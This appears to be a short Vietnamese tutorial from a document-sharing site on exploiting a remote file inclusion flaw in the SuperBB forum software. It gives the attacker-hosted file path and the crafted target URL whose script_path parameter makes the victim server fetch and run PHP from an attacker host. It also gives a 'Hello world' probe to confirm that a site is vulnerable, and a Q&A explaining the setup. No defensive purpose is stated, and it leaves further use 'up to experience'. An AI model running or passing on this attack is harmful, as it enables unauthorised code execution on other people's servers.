Tải bản đầy đủ (.doc) (1 trang)

Khai thác lỗi bảo mật forum SuperBB

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (29.66 KB, 1 trang )

Khai thác lỗi bảo mật forum SuperBB :
trang này đã được đọc lần
Tạo trên host
http://[attacker]/lang/1/1_options.php
Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_code=1
Cách test:
1. Đăng ký một host ko support PHP.
2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1, trong folder 1
tạo một file tên là 1_options.php với nội dung như sau:
CODE
<? echo "Hello world"; ?>
Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_code=1
Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này
Câu hỏi:
1. SupperBB vuln là gì?
2. Làm sao đăng kí host trên server đó được ( nếu họ ko cho )
3. Host ko support php thì làm sao hiển thị cái file 1_options.php được?
4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file 1_options.php , mục đích là để
làm gì?
5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó?
Trả lời :
1. Là lỗi bảo mật của forum SuperBB
2. Không cần đăng ký host trên server đó, đăng ký host ở đâu cũng được (nhưng ko được
support PHP)
3. Được, vì cái file 1_options.php ko phải được run trên host của mình mà được inject vào code
trên host của victim
4. Bởi vì script forum nó include đến file 1_options.php ở trong cấu trúc thư mục như thế
5. Làm được gì là tuỳ vào kinh nghiệm mỗi người

×